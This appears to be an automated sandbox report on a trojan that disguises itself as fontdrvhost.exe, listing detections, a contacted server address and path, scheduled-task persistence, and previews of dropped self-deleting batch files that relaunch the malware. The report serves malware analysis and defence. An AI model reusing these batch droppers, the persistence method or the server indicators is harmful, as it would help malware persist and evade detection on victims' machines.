                        C:\Users\user\AppData\Local\fontdrvhost.exe | 100% | Avira | HEUR/AGEN.1323342
                        C:\Users\user\AppData\Local\Temp\ZMh4UPVO0I.bat | 100% | Avira | BAT/Runner.IL
                        C:\Users\user\Desktop\CgRzmzKC.log | 100% | Avira | TR/PSW.Agent.qngqt
                        C:\Users\user\AppData\Local\Temp\OwDUg2gYJx.bat | 100% | Avira | BAT/Runner.IK
                        C:\Users\user\Desktop\ELDRalsN.log | 100% | Avira | HEUR/AGEN.1300079
                        C:\Users\user\AppData\Local\Temp\wuC6fcDv5B.bat | 100% | Avira | BAT/Runner.IK
                        C:\Users\user\AppData\Local\Temp\Gu3WPocxsu.bat | 100% | Avira | BAT/Runner.IL
                        C:\Users\user\AppData\Local\Temp\7nxekELsf0.bat | 100% | Avira | BAT/Runner.IK
                        C:\Users\user\Desktop\CGTrJaEm.log | 100% | Avira | TR/PSW.Agent.qngqt
                        C:\Users\user\Desktop\AFOsBjYP.log | 100% | Avira | HEUR/AGEN.1300079
                        C:\Users\user\AppData\Local\Temp\e2HUAivGfO.bat | 100% | Avira | BAT/Runner.IK
                        C:\Users\user\AppData\Local\Temp\3IMqqsTTOd.bat | 100% | Avira | BAT/Runner.IK
                        C:\Users\user\Desktop\CTQIQVae.log | 100% | Joe Sandbox ML
                        C:\Users\user\Desktop\CkrRJHNx.log | 100% | Joe Sandbox ML
                        C:\Users\user\AppData\Local\fontdrvhost.exe | 100% | Joe Sandbox ML
                        C:\Users\user\Desktop\AaPSReOe.log | 100% | Joe Sandbox ML
                        C:\Users\user\AppData\Local\fontdrvhost.exe | 87% | ReversingLabs | ByteCode-MSIL.Trojan.Zusy
                        C:\Users\user\AppData\Local\fontdrvhost.exe | 73% | Virustotal |  | Browse
                        C:\Users\user\Desktop\AFOsBjYP.log | 17% | ReversingLabs
                        C:\Users\user\Desktop\AFOsBjYP.log | 20% | Virustotal |  | Browse
                        C:\Users\user\Desktop\AaPSReOe.log | 5% | ReversingLabs
                        C:\Users\user\Desktop\AaPSReOe.log | 7% | Virustotal |  | Browse
                        C:\Users\user\Desktop\BxnIYuRz.log | 12% | ReversingLabs
                        C:\Users\user\Desktop\BxnIYuRz.log | 4% | Virustotal |  | Browse
                        C:\Users\user\Desktop\CGTrJaEm.log | 67% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
                        C:\Users\user\Desktop\CGTrJaEm.log | 69% | Virustotal |  | Browse
                        C:\Users\user\Desktop\COTaDrJc.log | 10% | ReversingLabs
                        C:\Users\user\Desktop\COTaDrJc.log | 21% | Virustotal |  | Browse
                        C:\Users\user\Desktop\CQeYyQPa.log | 8% | ReversingLabs
                        C:\Users\user\Desktop\CQeYyQPa.log | 6% | Virustotal |  | Browse
                        C:\Users\user\Desktop\CTQIQVae.log | 5% | ReversingLabs
                        C:\Users\user\Desktop\CTQIQVae.log | 7% | Virustotal |  | Browse
                        C:\Users\user\Desktop\CdkYHFFH.log | 9% | ReversingLabs
                        C:\Users\user\Desktop\CdkYHFFH.log | 6% | Virustotal |  | Browse
                        C:\Users\user\Desktop\CgRzmzKC.log | 67% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
                        C:\Users\user\Desktop\CgRzmzKC.log | 69% | Virustotal |  | Browse
                        C:\Users\user\Desktop\CkrRJHNx.log | 12% | ReversingLabs
                        C:\Users\user\Desktop\CkrRJHNx.log | 8% | Virustotal |  | Browse
                        C:\Users\user\Desktop\DACRVJoK.log | 12% | ReversingLabs
                        C:\Users\user\Desktop\DACRVJoK.log | 7% | Virustotal |  | Browse
                        C:\Users\user\Desktop\DEcjsSrF.log | 12% | ReversingLabs
                        C:\Users\user\Desktop\DEcjsSrF.log | 4% | Virustotal |  | Browse
                        C:\Users\user\Desktop\DQsQlVoZ.log | 12% | ReversingLabs
                        C:\Users\user\Desktop\DQsQlVoZ.log | 4% | Virustotal |  | Browse
                        C:\Users\user\Desktop\DdBAnNSZ.log | 12% | ReversingLabs
                        C:\Users\user\Desktop\DdBAnNSZ.log | 4% | Virustotal |  | Browse
                        C:\Users\user\Desktop\DnshUSLJ.log | 17% | ReversingLabs
                        C:\Users\user\Desktop\DnshUSLJ.log | 4% | Virustotal |  | Browse
                        C:\Users\user\Desktop\ELDRalsN.log | 8% | ReversingLabs
                        C:\Users\user\Desktop\ELDRalsN.log | 4% | Virustotal |  | Browse
                        C:\Users\user\Desktop\EOpBrqDR.log | 9% | ReversingLabs
                        C:\Users\user\Desktop\EOpBrqDR.log | 6% | Virustotal |  | Browse
                        C:\Users\user\Desktop\EQFIYaOX.log | 17% | ReversingLabs
                        C:\Users\user\Desktop\EQFIYaOX.log | 6% | Virustotal |  | Browse
                        C:\Users\user\Desktop\FWXhQVXq.log | 17% | ReversingLabs
                        C:\Users\user\Desktop\FWXhQVXq.log | 20% | Virustotal |  | Browse
                        C:\Users\user\Desktop\FWzHsBqG.log | 9% | ReversingLabs
                        C:\Users\user\Desktop\FWzHsBqG.log | 7% | Virustotal |  | Browse
                        No Antivirus matches
                        No Antivirus matches
                        Source | Detection | Scanner | Label | Link
                        http://89.23.98.225 | 0% | Avira URL Cloud | safe
                        http://89.23.98.225/8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generato | 0% | Avira URL Cloud | safe
                        http://89.23.98.225/8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php | 0% | Avira URL Cloud | safe
                        http://89.23.98.225/8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generato | 0% | Virustotal |  | Browse
                        http://89.23.98.225/8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php | 0% | Virustotal |  | Browse
                        http://89.23.98.225 | 0% | Virustotal |  | Browse
                        No contacted domains info
                        Name | Malicious | Antivirus Detection | Reputation
                        http://89.23.98.225/8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php | true
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        Name | Source | Malicious | Antivirus Detection | Reputation
                        http://89.23.98.225 | fontdrvhost.exe, 00000008.00000002.1704980568.0000000003102000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000000E.00000002.1796124572.00000000035D7000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000015.00000002.1883168171.0000000003347000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000002.1932041291.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000022.00000002.2017458339.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000023.00000002.2120982731.00000000033F7000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000002A.00000002.2116613612.0000000003855000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000033.00000002.2490608916.000000000363C000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000034.00000002.2251980191.0000000002F84000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
                        http://89.23.98.225/8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generato | fontdrvhost.exe, 00000034.00000002.2251980191.0000000002F84000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | ZT3pxe2Tb4.exe, 00000000.00000002.1647722543.0000000003A79000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000008.00000002.1704980568.0000000003102000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000000E.00000002.1796124572.00000000035D7000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000015.00000002.1883168171.0000000003347000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000002.1932041291.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000022.00000002.2017458339.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000023.00000002.2120982731.00000000033F7000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000002A.00000002.2116613612.0000000003855000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000033.00000002.2490608916.000000000363C000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000034.00000002.2251980191.0000000002F84000.00000004.00000800.00020000.00000000.sdmp | false | | high
                          IP | Domain | Country | ASN | ASN Name | Malicious
                          89.23.98.225 | unknown | Russian Federation | 48687 | MAXITEL-ASRU | true
                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1417387
                          Start date and time:2024-03-29 07:36:08 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 11m 4s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:65
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:ZT3pxe2Tb4.exe
                          renamed because original name is a hash value
                          Original Sample Name:4164D5955C244FF266C1CC41013FE21A.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@93/244@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:Failed
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, dllhost.exe, SIHClient.exe, conhost.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          Time | Type | Description
                          06:36:56 | Task Scheduler | Run new task: fontdrvhost path: "C:\Users\user\AppData\Local\fontdrvhost.exe"
                          06:36:56 | Task Scheduler | Run new task: fontdrvhostf path: "C:\Users\user\AppData\Local\fontdrvhost.exe"
                          07:37:00 | API Interceptor | 9x Sleep call for process: fontdrvhost.exe modified
                          No context
                          No context
                          Match | Associated Sample Name / URL | Detection | Threat Name | Context
                          MAXITEL-ASRU | 919KMNiWfM.exe | malicious | DCRat, PureLog Stealer, zgRAT | 89.23.96.177
                          MAXITEL-ASRU | WyuZdl33w7.exe | malicious | DCRat, PureLog Stealer, zgRAT | 89.23.96.177
                          MAXITEL-ASRU | q3JT7kcpCR.exe | malicious | DCRat | 89.23.97.121
                          MAXITEL-ASRU | qqeng.pdf.lnk | malicious | RHADAMANTHYS | 89.23.98.210
                          MAXITEL-ASRU | Instruction.pdf.lnk | malicious | Unknown | 89.23.98.210
                          MAXITEL-ASRU | ArfJNHXaQ4.exe | malicious | PureLog Stealer, RisePro Stealer | 89.23.99.219
                          MAXITEL-ASRU | whitelist.pdf.lnk | malicious | Unknown | 89.23.98.210
                          MAXITEL-ASRU | ChromeSetup.exe.lnk | malicious | Unknown | 89.23.98.210
                          MAXITEL-ASRU | install.pdf.lnk | malicious | RHADAMANTHYS | 89.23.98.210
                          MAXITEL-ASRU | Instruction.pdf.lnk | malicious | RHADAMANTHYS | 89.23.98.210
                          No context
                          Match | Associated Sample Name / URL | Detection | Threat Name
                          C:\Users\user\Desktop\AaPSReOe.log | O5OjRoFGIW.exe | malicious | DCRat, PureLog Stealer, zgRAT
                          C:\Users\user\Desktop\AaPSReOe.log | iY40ylvr5y.exe | malicious | DCRat, PureLog Stealer, zgRAT
                          C:\Users\user\Desktop\AaPSReOe.log | qObijSd3Uj.exe | malicious | DCRat, PureLog Stealer, zgRAT
                          C:\Users\user\Desktop\AaPSReOe.log | 2EHDj2G1ow.exe | malicious | DCRat, PureLog Stealer, zgRAT
                          C:\Users\user\Desktop\AaPSReOe.log | k6AIKkidxG.exe | malicious | DCRat
                          C:\Users\user\Desktop\AaPSReOe.log | file.exe | malicious | DCRat
                          C:\Users\user\Desktop\AaPSReOe.log | Um5hcJ3WPo.exe | malicious | DCRat, PureLog Stealer, zgRAT
                          C:\Users\user\Desktop\AaPSReOe.log | y48nZSvYdA.exe | malicious | DCRat, PureLog Stealer, zgRAT
                          C:\Users\user\Desktop\AaPSReOe.log | 919KMNiWfM.exe | malicious | DCRat, PureLog Stealer, zgRAT
                          C:\Users\user\Desktop\AaPSReOe.log | WyuZdl33w7.exe | malicious | DCRat, PureLog Stealer, zgRAT
                          C:\Users\user\Desktop\AFOsBjYP.log | O5OjRoFGIW.exe | malicious | DCRat, PureLog Stealer, zgRAT
                          C:\Users\user\Desktop\AFOsBjYP.log | iY40ylvr5y.exe | malicious | DCRat, PureLog Stealer, zgRAT
                          C:\Users\user\Desktop\AFOsBjYP.log | 7GTGpZi6oi.exe | malicious | DCRat, PureLog Stealer, zgRAT
                          C:\Users\user\Desktop\AFOsBjYP.log | GWCscceJsW.exe | malicious | DCRat, PureLog Stealer, zgRAT
                          C:\Users\user\Desktop\AFOsBjYP.log | QHZoYVBjSD.exe | malicious | DCRat, PureLog Stealer, zgRAT
                          C:\Users\user\Desktop\AFOsBjYP.log | qObijSd3Uj.exe | malicious | DCRat, PureLog Stealer, zgRAT
                          C:\Users\user\Desktop\AFOsBjYP.log | 2EHDj2G1ow.exe | malicious | DCRat, PureLog Stealer, zgRAT
                          C:\Users\user\Desktop\AFOsBjYP.log | UU5WXfH85a.exe | malicious | DCRat, PureLog Stealer, zgRAT
                          C:\Users\user\Desktop\AFOsBjYP.log | k6AIKkidxG.exe | malicious | DCRat
                          C:\Users\user\Desktop\AFOsBjYP.log | vFfb4XhxQq.exe | malicious | DCRat, PureLog Stealer, zgRAT
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:ASCII text, with very long lines (917), with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):917
                                                                  Entropy (8bit):5.900948306563715
                                                                  Encrypted:false
                                                                  SSDEEP:24:6cF0/r8duy8wnaq0Ml0lJ5wsV19jVuy6/Iku1/LU5V9:A4n8wnaDocQQ90y6/O/4J
                                                                  MD5:B8545BA39B8A7B3EA05F4EF0CE53D95B
                                                                  SHA1:33B779ACB3FFDCFE8447D970E2E8E83F0BF5D749
                                                                  SHA-256:BE89C6D26AA1DA38C7371EE80E805CDA89940C734D8C9869F6FB4E1284917D3F
                                                                  SHA-512:6F12B7C0FEF7451D040C33A42D9B0E61213A6E01A357A3064C95FA918CA45FD25C056A8B5F51C59EC60DBFCB6C0E128C98CE1DFA0506329E11707DFB94FFAAD5
                                                                  Malicious:false
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1915
                                                                  Entropy (8bit):5.363869398054153
                                                                  Encrypted:false
                                                                  SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4vHNpv:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4vb
                                                                  MD5:0C47412B6C6EF6C70D4B96E4717A5D3B
                                                                  SHA1:666FCC7898B52264D8A144600D7A3B0B59E39D66
                                                                  SHA-256:0B3F6655476FA555F55859443DE496AF7279529D291EF9745C22C5C283B648F9
                                                                  SHA-512:4E51FCBCA176BF9C5175478C23AE01445F13D9AC93771C7F73782AF9D98E8544A82BBFB5D3AA6E2F3ECF1EFB59A8466EB763A30BD795EFE78EE46429B2BEAC6C
                                                                  Malicious:false
                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1915
                                                                  Entropy (8bit):5.363869398054153
                                                                  Encrypted:false
                                                                  SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHpHNpaHKlT4x:iqbYqGSI6oPtzHeqKktwmj0qV1Jtpaq2
                                                                  MD5:73E7DD0D3AE6532ADBC6411F439B5DE3
                                                                  SHA1:427BE8DB5338D856906C1DDFBD186319A02F7567
                                                                  SHA-256:A80934D9E4D8FC0BBE46BD76A4FE0F66125C03B5A8F83265420242BE975DC8EE
                                                                  SHA-512:33FD10A43B9E16EAF568113F7298D34A730D9040693473A15739AED86228828095E42E16617D06F52363F970D517AD7D052FE520A9924EEC0A93F657CB631855
                                                                  Malicious:false
                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):172
                                                                  Entropy (8bit):5.061279544314783
                                                                  Encrypted:false
                                                                  SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1t+kiE2J5DQDWCSBktKcKZG1t+kiE2J5xAIdoUJf:hCRLuVFOOr+DE1wkn238GKOZG1wkn235
                                                                  MD5:D87CA980DB5E8FB9F78181AAF84F3564
                                                                  SHA1:FCD3953587B76A041A2DF96DF94AB0A24F36A912
                                                                  SHA-256:E957690A3C212FD8A7D58AF8940B4DADAF8EB526EB223F907FC43F31E3BEB733
                                                                  SHA-512:155F247762B10098A6E612165AD972B87402DC109B93B1718DC2C8B44E94F2C8E461B21B707F60FAA056DB44D59BC7B8879A602B1B5CA5C395CE0097336BC9BF
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\AppData\Local\fontdrvhost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\3IMqqsTTOd.bat"
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):172
                                                                  Entropy (8bit):5.103982904593541
                                                                  Encrypted:false
                                                                  SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1t+kiE2J5DQDWCSBktKcKZG1t+kiE2J5xAIMOBC:hCRLuVFOOr+DE1wkn238GKOZG1wkn23M
                                                                  MD5:07C88661B481CAD88B40404099C4CC0E
                                                                  SHA1:A22A8F5933605C8B08FB680FEB494A8538D90A05
                                                                  SHA-256:284EF516360450DF6C3DEA46D09E0D652D185043D658B0746C54DE5DDFFCFA91
                                                                  SHA-512:C0DB3314E97D0B9BCE525BEB3238DC2E285EE860B1C7709AADC25427F2B9CBCA21DC2DDD85D4BCB0379BB3354A75AC78F556CB97928649379C5B77CC0285A06A
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\AppData\Local\fontdrvhost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\6WkFIbRMFr.bat"
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):172
                                                                  Entropy (8bit):5.013740920164111
                                                                  Encrypted:false
                                                                  SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1t+kiE2J5DQDWCSBktKcKZG1t+kiE2J5xAIqqhn:hCRLuVFOOr+DE1wkn238GKOZG1wkn23F
                                                                  MD5:4B3FE765B941CC186043E2CDA941073B
                                                                  SHA1:02BD199725BAF725AB45BB6D885D343DC2B89A99
                                                                  SHA-256:1FE7F83D85A1CECD83BC027A6E4AA5B3C1E239DEC1470EE42CD9845AD3DC8876
                                                                  SHA-512:B747A27A432961671D0B10910A07B37DC6746013AC8BC7E79208579791FF08EF39880479164E46E9AFB8A3C4206B053082EC5A99EA77E3E4D358029DC741EF92
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\AppData\Local\fontdrvhost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\7nxekELsf0.bat"
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):25
                                                                  Entropy (8bit):4.213660689688185
                                                                  Encrypted:false
                                                                  SSDEEP:3:hUPa3pHLC:hgep2
                                                                  MD5:EC3D490E692003B3F06CF3ED8CEFEBC8
                                                                  SHA1:49E827AF66EACAB930A1D41CE9DB3934E8BED1C4
                                                                  SHA-256:BC825A8B016DCA231750437BC084017065555C3E85C0DFBB8A7BC6252E601CE7
                                                                  SHA-512:5A5C7A43895E01E4A820F96B3072301A0C214AE508D23794AA290633E29C2DC79294236A39970A8019F2D095E7E5424BD5DD02385291B211C468B9F3121A7143
                                                                  Malicious:false
                                                                  Preview:aW9ILXDC37L6EzWOErHgLbjVg
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):220
                                                                  Entropy (8bit):5.028872750660074
                                                                  Encrypted:false
                                                                  SSDEEP:6:hCijTg3Nou1SV+DE1wkn238GKOZG1wkn23fb0:HTg9uYDEmfHfI
                                                                  MD5:3A292AABD3E44257FD8A7EE6DBED7E09
                                                                  SHA1:2810D68994A7375D719CDFD3DDD90FE29E6E8CE9
                                                                  SHA-256:0983E85255C0D2E7D3226548BBA056FF7FA7DCC08638F8D9ECF68D8F72F7109B
                                                                  SHA-512:EA59220357F6B3F6F27DBDED27B084634F16439F6D67EC410178878DA8577C3955AF4BE3FD7DBE766222812DC1C3D22BFE19116B2C18A1F19D047B1045F5D3F3
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\AppData\Local\fontdrvhost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\Gu3WPocxsu.bat"
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):25
                                                                  Entropy (8bit):4.323856189774723
                                                                  Encrypted:false
                                                                  SSDEEP:3:U8oSm:U8e
                                                                  MD5:3E8C6A3FFB19DEBE2248F7EF5E567E1C
                                                                  SHA1:29F09C502F858739EE2BA2438FB54A075D3BEDD8
                                                                  SHA-256:F91C663966C01F752EA30A24BCF748456ACFE0786A2B7C69EB105AE5C4D99A18
                                                                  SHA-512:7466210466C7B3A6057ACCCEAB6132587E587859DC08EF6544BE7655671B38543135DAA47CBC0EE38DC9347A497C4343B7CCE98FDE2A7C9A18EF3D485EB914CF
                                                                  Malicious:false
                                                                  Preview:rbbjzADJctN2A8QwNMB90CU7C
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):25
                                                                  Entropy (8bit):4.0536606896881855
                                                                  Encrypted:false
                                                                  SSDEEP:3:NOqvQs4:CR
                                                                  MD5:DFA6EB90735BF4BF6A1FCBFE2ACC5DDE
                                                                  SHA1:15878133E6B4497286C77D1F084DDD97F2BD734D
                                                                  SHA-256:0E078D58F65DC936DA3CA95B2193D23E26591069AB5AB3E984818D0D3FF72F36
                                                                  SHA-512:76594A1F1E5C48E2CFFBB56E3855C5E9566523708ACC7A59749D07300E72DD8FD719592B02738FFCE6682314EAD96CB4344FFB4B2F86D453E20496F2AB689B1A
                                                                  Malicious:false
                                                                  Preview:DDXiAILY5ZMR0YMuGviIJXDol
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):172
                                                                  Entropy (8bit):5.100174636965321
                                                                  Encrypted:false
                                                                  SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1t+kiE2J5DQDWCSBktKcKZG1t+kiE2J5xAIduHERH:hCRLuVFOOr+DE1wkn238GKOZG1wkn23l
                                                                  MD5:E6B2FE52B6E78462FAABD15DF64ADF63
                                                                  SHA1:D01AB1667A943A0E36ACE20BB5D37B77AF3075BA
                                                                  SHA-256:2472BCDC75D3866723B45A43A6EE564D2AA0C0EBFE27CBEFB44EEE3DCAF0D718
                                                                  SHA-512:B5D30E6AB5D3AFD78F69651499F6D8DD5F49A0A08CB9CC0C65592F332175BC3C8FAAB3587BE255583A666F1D6F7B5849DDE279EC7681FE8A3BA8CED444F507C2
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\AppData\Local\fontdrvhost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\I3W1TCNLwG.bat"
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):25
                                                                  Entropy (8bit):4.003856189774725
                                                                  Encrypted:false
                                                                  SSDEEP:3:180wsZO:AKO
                                                                  MD5:62DE5A7B9C3CCC3D3D1E94153C1ECD91
                                                                  SHA1:34FB0661D3597A26349C0B34426ED7657E59EC23
                                                                  SHA-256:3251F06A61AF362C129B6D9DA8976D3D2F8A33ED3A514DE0CECA281739160B96
                                                                  SHA-512:92C785B2CAC16489C56AD42A2EBA1611C55ACB576D0F24082790959F408BF17F8339EAB29FFB2B27B23A0A705C696DC4C45B07703CE6A8CCA05CCA46F979DB99
                                                                  Malicious:false
                                                                  Preview:2RPcj4pcpUXV9ljDlYKUIcA6c
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):25
                                                                  Entropy (8bit):4.133660689688185
                                                                  Encrypted:false
                                                                  SSDEEP:3:uAiHSRHGSN:uAkmGSN
                                                                  MD5:B5B5F55AA56BDA65BE3D0E8DD3330CC4
                                                                  SHA1:AF80A8406BD3EEA9D94E709AB8CF37B8DAD3E07C
                                                                  SHA-256:8F09969D7402D3B71CE25D4D6477780F69BFB4F7AD474137E5B1A83F38395C05
                                                                  SHA-512:B67571C7FE84691E3880CADA3472CE82C8D0CCC0E3A13FD8466F9D3ABE7106828DAE0A27E371807075D53C53F149E0943DE35F15157B7BBE82C2B0907E8950B3
                                                                  Malicious:false
                                                                  Preview:IjbQLPGb7tGB9hg7ML30iGA3l
